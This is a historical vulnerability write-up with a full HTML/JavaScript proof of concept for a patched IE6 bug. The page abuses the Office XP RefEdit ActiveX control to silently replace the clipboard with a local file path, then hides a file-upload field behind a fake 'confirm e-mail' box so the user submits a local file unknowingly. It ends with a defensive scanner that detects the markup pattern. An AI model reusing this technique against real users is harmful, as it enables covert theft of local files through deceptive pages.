The Office XP RefEdit ActiveX control has a Cut method that writes to the clipboard without triggering IE’s clipboard permission prompt. A page can use this to silently replace whatever text the user copies — with a file path — so that when the user pastes what they believe is their email address into a second input field, they’re actually pasting a server-side path that gets submitted as a file upload.

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>Phishing with IE6 and RefEdit Control</title></head>
<body>
<div style="position:absolute;top:10px;left:10px;">
	<div style="position:absolute;top:0px;left:0px;width:400px;height:120px;border:ridge;"></div>
	<div style="position:absolute;top:0px;left:0px;width:160px;height:300px;">
		<input tabindex=1 oncopy="setTimeout('changeClipBoardData();',1)" type="text" id="iText" style="width:151px;position:absolute;top:10px;left:10px;">
		<input tabindex=2 onpaste="hideInputFileAndShowInputText();" type="file" id="iFile" style="width:240px;position:absolute;top:40px;left:10px;">
		<input type="text" id="iFakeFile" style="visibility:hidden;width:151px;position:absolute;top:40px;left:10px;">

	</div>
	<div id="daCover" style="position:absolute;top:10px;left:168px;width:200px;height:100px;background-Color:#ffffff">
		<span style="position:absolute;top:2px;left:10px;font-family:Tahoma,Arial;font-weight:bold;font-size:11px;">Enter your E-Mail address</span>
		<span style="position:absolute;top:32px;left:10px;font-family:Tahoma,Arial;font-weight:bold;font-size:11px;">Confirm Your E-Mail Address</span>
	</div>
	<input type="submit" onclick="showTheRealThing();" style="position:absolute;top:90px;left:120px;font-family:Tahoma,Arial;font-weight:bold;font-size:11px;">
</div>
<object style="position:absolute;top:-100000px;" id="oText" classid="clsid:00024512-0000-0000-C000-000000000046" width="200" height="50"></object>

<script language="JavaScript">
function changeClipBoardData()
{
	oText.Text="C:\\Windows\\System32\\sol.exe";
	oText.SelStart=0;
	oText.SelLength=oText.Text.length;
	oText.Cut();
}
function hideInputFileAndShowInputText()
{
	iFile.style.visibility='hidden';
	iFakeFile.style.visibility='visible';
	iFakeFile.focus();
	iFakeFile.value=iText.value;
}
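function showTheRealThing()
{
	// Reveal the real file input that sat behind the cover and the fake text box.
	iFile.style.visibility='visible';
	// No element with id "explanation" exists in this copy of the page;
	// skip it when missing so the rest of the reveal still runs.
	var explanation=document.getElementById('explanation');
	if (explanation) explanation.style.visibility='visible';
	iFile.style.width='350px';
	daCover.style.visibility='hidden';
	iText.style.visibility='hidden';
	iFakeFile.style.visibility='hidden';
}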
window.onload=function()
{
	if (oText.readyState!=4)
	{
		alert("Sorry, this little bug works only in IE6 with Office XP installed");
	}
}
</script>
</body>
</html>

The flow: the user types their email address into the first field, then copies it to paste into the second. The oncopy handler fires, and the RefEdit control's Cut method silently replaces the clipboard contents with C:\Windows\System32\sol.exe. The user pastes what they believe is their email into the second input (actually a file input, disguised by the cover div), which gets filled with the path; the onpaste handler then swaps in a look-alike text box showing the typed address. After submit, the server receives that file. The visible UI hides all of this completely.
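A defender-side check for the pattern described above, as an added example that is not part of the original proof of concept: it scans page markup for the RefEdit classid used on this page, a file input with a paste handler, and a copy handler that defers script. The function names, finding labels and sample markup are constructed for illustration, and the regex scan is a triage heuristic, not a full HTML parser.

```javascript
// Added example: static triage for the markup pattern used in the proof of concept.
// REFEDIT_CLSID comes from the page; tags() and auditPage() are hypothetical helpers.
const REFEDIT_CLSID = '00024512-0000-0000-c000-000000000046';

// Return each opening tag named `name` as { raw, attrs }, attribute names lower-cased.
function tags(html, name) {
  const out = [];
  const tagRe = new RegExp('<' + name + '\\b([^>]*)>', 'gi');
  const attrRe = /([\w:-]+)\s*=\s*("([^"]*)"|'([^']*)'|([^\s"'>]+))/g;
  let m;
  while ((m = tagRe.exec(html)) !== null) {
    const attrs = {};
    let a;
    while ((a = attrRe.exec(m[1])) !== null) {
      attrs[a[1].toLowerCase()] = a[3] ?? a[4] ?? a[5] ?? '';
    }
    out.push({ raw: m[0], attrs });
  }
  return out;
}

function auditPage(html) {
  const findings = [];
  const inputs = tags(html, 'input');
  // 1. The RefEdit control instantiated from web content.
  for (const o of tags(html, 'object')) {
    const clsid = (o.attrs.classid || '').toLowerCase().replace(/^clsid:/, '');
    if (clsid === REFEDIT_CLSID) findings.push('refedit-activex');
  }
  // 2. A file input that reacts to paste: its path arrives via clipboard, not a dialog.
  if (inputs.some(i => (i.attrs.type || '').toLowerCase() === 'file' && 'onpaste' in i.attrs)) {
    findings.push('file-input-onpaste');
  }
  // 3. A copy handler that defers script, the hook used to swap clipboard contents.
  if (inputs.some(i => /setTimeout|setInterval/.test(i.attrs.oncopy || ''))) {
    findings.push('deferred-oncopy');
  }
  return findings;
}

// Constructed samples: markup reduced from the page above, and a benign upload form.
const POC_MARKUP = `
<input oncopy="setTimeout('changeClipBoardData();',1)" type="text" id="iText">
<input onpaste="hideInputFileAndShowInputText();" type="file" id="iFile">
<object id="oText" classid="clsid:00024512-0000-0000-C000-000000000046"></object>`;
const BENIGN_MARKUP = `<input type="text" name="email"><input type="file" name="avatar">`;
console.log(auditPage(POC_MARKUP));
console.log(auditPage(BENIGN_MARKUP));
```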

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.